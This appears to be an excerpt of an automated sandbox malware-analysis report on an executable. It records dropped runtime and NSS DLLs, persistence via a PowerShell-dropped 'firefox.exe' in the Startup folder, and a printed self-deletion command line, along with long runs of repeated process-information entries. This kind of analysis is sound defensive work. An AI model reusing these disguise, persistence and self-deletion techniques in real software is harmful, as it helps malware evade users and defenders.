Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	File created: C:\Users\user\AppData\Local\Temp\8F3E16B2\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file

Boot Survival

Drops PE files to the startup folder

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe\:Zone.Identifier:$DATA			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "jd4t3R7hOq.exe"
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process created: "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "jd4t3R7hOq.exe"			Jump to behavior

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe

Code function: 7_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

7_2_00417B1A

Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jd4t3R7hOq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\firefox.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
